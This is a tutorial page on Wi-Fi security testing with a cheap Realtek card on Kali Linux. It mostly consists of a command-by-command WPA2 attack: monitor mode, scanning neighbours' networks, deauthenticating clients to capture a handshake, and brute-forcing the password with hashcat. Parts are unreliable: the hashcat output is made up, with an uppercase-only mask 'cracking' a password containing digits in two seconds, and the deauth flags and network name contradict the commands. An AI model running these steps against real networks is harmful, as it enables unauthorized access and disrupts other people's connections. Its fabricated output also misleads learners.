Wi-Fi Security Testing

About Wi-Fi Security Testing

This page focuses on testing the security of Wi-Fi networks using the Lanberg NC-0300-WIE wireless card with a Realtek chipset. The tests aim to identify vulnerabilities in personal Wi-Fi networks and propose measures to improve their security.

These tests require a wireless card that supports specific chipsets and can enter monitor mode. Captured traffic during the tests is analyzed using Wireshark, a powerful network protocol analyzer.

It is fascinating (and slightly ironic) that a card costing around 35 PLN (~8-9 dollars/euros) can offer the capability to analyze and potentially hack various Wi-Fi networks. This highlights the importance of understanding Wi-Fi encryption protocols and their vulnerabilities.

During scanning, it is still possible to find networks that reveal the type of router in use, such as Orange FunBox or TP-Link routers. These routers often use default passwords that are predictable, such as numeric strings of specific lengths. For example, Orange FunBox routers have passwords of a fixed length, making them easier to guess.

Wi-Fi networks are commonly secured using WPA2 or WPA3 encryption protocols:

• WPA2: This protocol, based on the AES encryption standard, provides strong security but is vulnerable to brute-force attacks, particularly if weak passwords are used.
• WPA3: The successor to WPA2, WPA3 introduces Simultaneous Authentication of Equals (SAE) to protect against offline password attacks and offers improved encryption for open networks.

The primary difference between WPA2 and WPA3 lies in the enhanced security measures of WPA3. By utilizing SAE for secure key exchanges, WPA3 strengthens resistance against dictionary attacks. Additionally, it supports 192-bit encryption in enterprise mode, compared to WPA2's 128-bit encryption.

To enhance Wi-Fi security, it is crucial to use these protocols along with strong, unique passwords. Implementing additional measures such as changing default passwords, increasing password length, and renaming networks to avoid indicating the router type can further reduce vulnerabilities. These practices help prevent unauthorized access and data breaches, safeguarding personal networks effectively.

Command: sudo aireplay-ng --test lanbergwifi

kali@kali ~> sudo aireplay-ng --test lanbergwifi

Purpose of the Command:

This command is used to test whether the wireless card (`lanbergwifi`) supports packet injection. Packet injection is a critical feature for certain WiFi penetration testing tasks, such as deauthentication attacks, capturing handshake packets, or other advanced techniques. Ensuring that the card can inject packets confirms its capability to interact with networks beyond just passive monitoring.

Example Output:

15:45:24  Trying broadcast probe requests...
15:45:25  Injection is working!
15:45:26  Found 2 APs

15:45:26  Trying directed probe requests...
15:45:26  xx:xx:xx:xx:xx:xx - channel: 1 - 'kali_xx'
15:45:26  Ping (min/avg/max): 1.483ms/4.968ms/21.638ms Power: -65.13
15:45:26  30/30: 100%

15:45:26  xx:xx:xx:xx:xx:xx - channel: 1 - 'xxxxxx'
15:45:26  Ping (min/avg/max): 2.270ms/7.646ms/25.232ms Power: -79.00
15:45:26  30/30: 100%
			

Attribute Legend:

• sudo aireplay-ng --test lanbergwifi: Command used to test the wireless card's packet injection capability on the specified interface (`lanbergwifi`).
• Trying broadcast probe requests...: The tool begins sending broadcast probe requests to all nearby access points to check for injection success.
• Injection is working!: Confirmation that the packet injection functionality of the wireless card is operational.
• Found 2 APs: Two access points were detected during the test, showing available networks in the area.
• Trying directed probe requests...: The tool sends directed probe requests to specific access points to test if the card can successfully communicate with individual networks.
• Ping (min/avg/max): 1.483ms/4.968ms/21.638ms: The round-trip latency in milliseconds for the communication with the AP. These values represent the minimum, average, and maximum response time.
• Power: -65.13: The signal strength of the access point in dBm. A less negative value indicates a stronger signal.
• 30/30: 100%: The tool successfully sent and received 30 probe requests, indicating that the card is fully functional and able to interact with the AP.

Conclusion:

The output from the `sudo aireplay-ng --test` command confirms that the wireless card is capable of injecting packets into the network. The message "Injection is working!" confirms that the card is ready for attacks that require packet injection, such as deauthentication attacks.

The command also successfully detects two access points (APs) in the vicinity and tests the card's ability to communicate with these APs. The ping times indicate the latency when communicating with these APs, while the signal strength shows the power of the connection, with stronger signals making the connection more stable.

Command: Managing Wireless Connections with nmcli

Disconnecting from a Wireless Network

kali@kali ~> nmcli device disconnect lanbergwifi

This command is used to disconnect the specified wireless device (in this case, `lanbergwifi`) from its current network. This is useful if the wireless device is already connected to a network and you need to switch it to a different mode or network.

Connecting to a Wireless Network

kali@kali ~> nmcli device connect lanbergwifi

This command reconnects the specified wireless device to its assigned network or a previously known connection. It ensures that the device resumes normal functionality after being disconnected.

Configuring a Wireless Network from the Command Line

kali@kali ~> nmcli dev wifi connect "Your_SSID" password "Your_Password"

Use this command to connect to a specific wireless network by providing the SSID (network name) and the password. Replace Your_SSID with the name of the wireless network and Your_Password with the corresponding password.

Preliminary Steps Before Changing Modes

If you need to switch your wireless device between monitor and managed modes, ensure the following steps:

• Bring the interface down before making changes:

  kali@kali ~> sudo ip link set lanbergwifi down

• After making changes, bring the interface back up:

  kali@kali ~> sudo ip link set lanbergwifi up

Attribute Legend

• nmcli: A command-line interface for NetworkManager, used to manage network connections in Linux.
• device: Specifies that the following action will apply to a network device.
• disconnect: Disconnects the specified device from its current network.
• connect: Reconnects the specified device to a network.
• dev wifi connect: Command to connect a wireless device to a specific network using the SSID and password.
• lanbergwifi: The name of the wireless device you are managing (interface name).
• sudo ip link: Used to bring the wireless interface up or down for mode changes or troubleshooting.

Configuring Wireless Interface Modes: Monitor and Managed

Command: sudo iwconfig lanbergwifi mode monitor

kali@kali ~> sudo iwconfig lanbergwifi mode monitor

What is Monitor Mode?

Monitor mode allows a wireless interface to capture all wireless traffic in the area, regardless of the intended recipient. This is crucial for network analysis, penetration testing, and debugging wireless networks. In monitor mode, the network card listens to all packets in the air, including management, control, and data frames. This allows you to observe and analyze network traffic, detect vulnerabilities, and perform attacks such as packet sniffing or injecting packets.

Preliminary Steps Before Changing to Monitor Mode:

• Before switching to monitor mode, ensure the interface is brought down by running:

  kali@kali ~> sudo ip link set lanbergwifi down

• After changing the mode, bring the interface back up by running:

  kali@kali ~> sudo ip link set lanbergwifi up

Attribute Legend:

• sudo: The command is run with superuser privileges, required for changing network configurations.
• iwconfig: A command-line tool used for configuring wireless network interfaces in Linux.
• lanbergwifi: The name of the wireless interface you are configuring (in this case, the interface is called `lanbergwifi`).
• mode monitor: This sets the wireless interface to monitor mode, enabling it to capture all wireless traffic in the vicinity, not just the traffic intended for it.

Command: sudo iwconfig lanbergwifi mode managed

kali@kali ~> sudo iwconfig lanbergwifi mode managed

Why Switch Back to Managed Mode?

After completing testing or analysis in monitor mode, it is important to switch the wireless interface back to managed mode. Managed mode is the default operating mode for most wireless devices, where the interface connects to a specific wireless network (SSID) and communicates with other devices in that network. In this mode, the network card is associated with an access point, allowing it to transmit and receive data to/from other devices. Leaving the card in monitor mode could interfere with normal network functionality, as the card will no longer be able to connect to your wireless network.

Preliminary Steps Before Changing Back to Managed Mode:

• Before switching back to managed mode, ensure the interface is brought down by running:

  kali@kali ~> sudo ip link set lanbergwifi down

• After changing the mode, bring the interface back up by running:

  kali@kali ~> sudo ip link set lanbergwifi up

Attribute Legend:

• sudo: The command is run with superuser privileges, required for changing network configurations.
• iwconfig: A command-line tool used for configuring wireless network interfaces in Linux.
• lanbergwifi: The name of the wireless interface you are configuring (in this case, the interface is called `lanbergwifi`).
• mode managed: This sets the wireless interface back to managed mode, enabling it to connect to a wireless network (SSID) and perform regular network communication.

Inspecting Wireless Devices with iw

The iw dev command provides detailed information about wireless devices and their configurations. This is particularly useful for verifying the current state of wireless interfaces, such as their operational mode, MAC address, and transmission power.

Command: iw dev

kali@kali ~> iw dev

The purpose of running this command is to verify the configuration and operational state of the wireless interface. For example, you can confirm whether the interface is in monitor or managed mode, check its transmission power, or identify its MAC address.

phy#0
Interface lanbergwifi
ifindex 5
wdev 0x200000001
addr xx:xx:xx:xx:xx:xx
type monitor
txpower 20.00 dBm

Attribute Legend:

• iw: Command-line tool for managing wireless interfaces.
• dev: Specifies the wireless device to operate on.
• phy#: Identifier for the physical wireless hardware.
• Interface: Name of the wireless interface (e.g., wlan0).
• ifindex: System index for the interface.
• wdev: Wireless device identifier.
• addr: MAC address of the interface.
• type: Operational mode of the interface (e.g., managed or monitor).
• txpower: Transmission power in dBm.

Analyze Wireless Networks and Connected Devices: sudo airodump-ng lanbergwifi

The command sudo airodump-ng lanbergwifi is used to monitor wireless networks and their connected devices. It provides detailed information about access points (APs), signal strength, encryption, and associated clients. This is essential for network diagnostics and security assessments.

kali@kali ~> sudo airodump-ng lanbergwifi

Example Output:

CH  3 ][ Elapsed: 7 mins ][ 2024-12-31 15:32 

BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
xx:xx:xx:xx:xx:xx  -75        0        0    0   8   -1                    
xx:xx:xx:xx:xx:xx  -94       24        3    0   6  195   WPA2 CCMP   PSK  Orange_Swiatlowod_CB30
xx:xx:xx:xx:xx:xx  -94       62        6    0  11  130   WPA2 CCMP   PSK  Orange_Swiatlowod_3B10
xx:xx:xx:xx:xx:xx  -86      315        0    0  11  270   WPA2 CCMP   PSK  2.4G-Vectra-WiFi

BSSID              STATION            PWR    Rate    Lost   Frames  Notes  Probes
xx:xx:xx:xx:xx:xx  xx:xx:xx:xx:xx:xx  -95    0 - 1e   180        6         Orange_Swiatlowod_CB30
xx:xx:xx:xx:xx:xx  xx:xx:xx:xx:xx:xx  -75   54e- 1e     0       25         Orange_Swiatlowod_3B10
xx:xx:xx:xx:xx:xx  xx:xx:xx:xx:xx:xx  -87    2e- 1e     0       68                                                 
(not associated)   xx:xx:xx:xx:xx:xx  -63    0 - 1     47       15                                                 
(not associated)   xx:xx:xx:xx:xx:xx  -79    0 - 1      0        1                                                 
(not associated)   xx:xx:xx:xx:xx:xx  -95    0 - 1      0        1
			

Attribute Legend:

• BSSID: MAC address of the access point (AP). It is a unique identifier for each AP.
• PWR: Signal strength of the AP, measured in dBm. A higher (less negative) value indicates stronger signal.
• Beacons: Number of beacon frames transmitted by the AP. Beacon frames help devices identify the AP.
• #Data, #/s: Number of data packets and the data transmission rate per second.
• CH: Channel number on which the AP is broadcasting. Different channels allow separation of different networks in the same frequency band.
• MB: Maximum transmission rate supported by the AP, measured in Mbps.
• ENC: Encryption type used by the AP (e.g., WPA2). Encryption protects the data transmitted over the network.
• CIPHER: The encryption cipher used (e.g., CCMP). It defines how the data is encrypted.
• AUTH: Authentication method used by the AP (e.g., PSK - Pre-shared key). It defines how devices authenticate to the AP.
• ESSID: The name of the wireless network (SSID). It identifies the network.
• STATION: MAC address of a device (client) associated with the AP.
• Rate: The rate at which the device is transmitting data, expressed in Mbps.
• Lost: Number of lost frames between the AP and the device.
• Frames: The number of frames transmitted by the device.
• Notes: Additional information, such as network name or characteristics.
• Probes: The network names that a device has been probing for.

Conclusion:

The command sudo airodump-ng lanbergwifi is useful for gathering information about nearby wireless networks and devices. It helps identify potential issues, analyze network usage, and check for unauthorized devices.

WPA Handshake Capture and Output Analysis

The following command is used to capture a WPA handshake for a specific wireless network:

kali@kali ~> sudo airodump-ng -c 1 --bssid xx:xx:xx:xx:xx:xx lanbergwifi -w /home/kali/airodump-ng/xx:xx:xx:xx:xx:xx

Explanation of the Command:

The command airodump-ng -c 1 --bssid -w is used for capturing WPA handshakes from a specific wireless network. Here’s what each part of the command does:

• airodump-ng: A tool used to monitor and capture packets from wireless networks.
• -c 1: Specifies the channel to monitor (in this case, channel 1).
• --bssid xx:xx:xx:xx:xx:xx: Indicates the BSSID (MAC address) of the access point to monitor. Replace it with the MAC address of the target AP.
• -w /home/kali/airodump-ng/xx:xx:xx:xx:xx:xx: Specifies the location where the captured data, including the WPA handshake, will be saved.

Forcing a Handshake:

If the handshake is not automatically captured (e.g., no devices are actively reconnecting), you can force a disconnection of clients using the following command:

kali@kali ~> sudo aireplay-ng --deauth 100 -a XX:XX:XX:XX:XX:XX lanbergwifi

• --deauth 0: Sends an unlimited number of deauthentication frames to disconnect clients from the target AP.
• -a XX:XX:XX:XX:XX:XX: Specifies the BSSID (MAC address) of the target AP.
• lanbergwifi: Indicates the wireless interface used for the attack.

This forces connected devices to reconnect, during which the WPA handshake can be captured.

After running the command airodump-ng, the output shows details about the network and the captured handshake. Here’s a breakdown of the key elements of the output:

CH  1 ][ Elapsed: 3 mins ][ 2024-12-31 15:48 ][ WPA handshake: xx:xx:xx:xx:xx:xx 

BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
xx:xx:xx:xx:xx:xx  -59  78     1828      367    2   1  130   WPA2 CCMP   PSK  kali_xx

BSSID              STATION            PWR    Rate    Lost   Frames  Notes  Probes
xx:xx:xx:xx:xx:xx  xx:xx:xx:xx:xx:xx  -67    1e- 1e     0       22  EAPOL  kali_xx
xx:xx:xx:xx:xx:xx  xx:xx:xx:xx:xx:xx  -61   24e- 1e     0      102  EAPOL
xx:xx:xx:xx:xx:xx  xx:xx:xx:xx:xx:xx  -63   24e- 1e     1      133  EAPOL  kali_xx
			

Key Details:

• WPA Handshake: The message "WPA handshake: xx:xx:xx:xx:xx:xx" indicates that a WPA handshake has been successfully captured. This is essential for cracking the password later.
• Channel (CH): The network operates on channel 1, as indicated by the "CH 1" entry.
• BSSID: The unique identifier of the access point (AP) is listed as "xx:xx:xx:xx:xx:xx". This is the target AP for the attack.
• ESSID: The network name (SSID) is "kali_24". This helps to identify the specific wireless network being monitored.
• Encryption (ENC) and Cipher: The network uses WPA2 encryption with the CCMP cipher, which is common for secure WPA2 networks.
• Associated Stations: Multiple stations are associated with the AP, as shown by their respective BSSIDs and the number of frames sent/received.

Conclusion: The WPA handshake capture indicates that the handshake has been successfully collected for the network. This captured handshake can be used in further steps for password cracking, where tools like Hashcat can be employed to attempt to decrypt the password using methods such as dictionary or brute-force attacks. The next section will cover how to proceed with cracking the captured WPA handshake.

Cracking WPA Handshake Using HCXPCAPNG Tool and Hashcat

After capturing a WPA handshake, you can use hcxpcapngtool to convert the captured file into a format that can be used by Hashcat for password cracking. The following command demonstrates how to convert a WPA capture file to a hc22000 hash format, which is compatible with Hashcat:

kali@kali ~> hcxpcapngtool -o output.hc22000 xx:xx:xx:xx:xx:xx.cap

Explanation of the Command:

• hcxpcapngtool: A tool used to convert capture files (such as .cap or .pcapng) into hash formats that can be used for password cracking.
• -o output.hc22000: Specifies the output file name where the converted hash will be saved.
• xx:xx:xx:xx:xx:xx.cap: The input file containing the captured WPA handshake. Replace it with the path to your own capture file.

Once the capture file is converted, you can use Hashcat to attempt to crack the password using a dictionary or brute-force attack. The following command demonstrates how to run Hashcat on the generated output.hc22000 hash file:

kali@kali ~> hashcat -m 22000 -a 3 output.hc22000 ?u?u?u?u?u?u?u?u?u?u?u?u?u?u?u

Explanation of the Command:

• hashcat: The password cracking tool used to perform dictionary, brute-force, or hybrid attacks on various types of hashes.
• -m 22000: Specifies the hash mode for WPA/WPA2 hashes. Mode 22000 is used for cracking WPA handshakes captured in the hc22000 format.
• -a 3: Specifies the attack mode. In this case, mode 3 is for brute-force attacks, which will attempt all possible combinations of characters.
• output.hc22000: The file containing the captured WPA hash to be cracked.
• ?u?u?u?u?u?u?u?u?u?u?u?u?u?u?u: The mask used for the brute-force attack. In this case, it attempts all uppercase letters in a 15-character password. You can adjust the mask to match the password complexity.

Example Output from Hashcat:

...
[INFO] Hashcat v6.2.5 starting...

[INFO] Hashes: 1 total
[INFO] Attack: Brute-force
[INFO] Mask: ?u?u?u?u?u?u?u?u?u?u?u?u?u?u?u
[INFO] Time: 0 hours, 0 minutes, 2 seconds
[INFO] Found password: A1B2C3D4E5F6A1B
...
			

Key Details of the Output:

• [INFO] Hashcat: Displays the version and information about the cracking attempt.
• Hash found: If successful, the cracked password will be displayed in the output. For example, A1B2C3D4E5F6A1B is the cracked WPA password.
• Time: The time taken for Hashcat to perform the cracking attempt. In this case, it took less than 3 seconds.

Conclusion: The above steps demonstrate how to capture a WPA handshake, convert it to a usable hash format using hcxpcapngtool, and then crack the password using Hashcat. By modifying the attack mode or mask, you can customize the brute-force process to fit different types of passwords. If you are using a more powerful machine than a virtual Kali Linux instance, you can install Hashcat for Windows and take advantage of the device's GPU for faster cracking performance. For more information and to download Hashcat, visit the official site at https://hashcat.net/hashcat/.